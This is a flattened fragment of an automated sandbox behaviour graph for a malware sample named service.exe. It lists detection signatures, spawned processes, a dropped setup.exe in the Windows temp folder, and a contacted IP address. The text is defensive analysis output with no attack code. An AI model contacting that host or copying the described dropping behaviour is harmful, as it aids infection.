  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 206794 Sample: service.exe Startdate: 07/02/2020 Architecture: WINDOWS Score: 100 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for sample 2->47 49 3 other signatures 2->49 7 service.exe 16 2->7         started        11 msradvb.exe 2->11         started        14 cmd.exe 2 2->14         started        16 cmd.exe 2 2->16         started        process3 dnsIp4 39 45.79.223.161, 443, 49868 unknown United States 7->39 35 C:\Windows\Temp\setup.exe, PE32 7->35 dropped 18 setup.exe 7->18         started        59 Drops executables to the windows directory (C:\Windows) and starts them 11->59 21 msradvb.exe 12 11->21         started        24 conhost.exe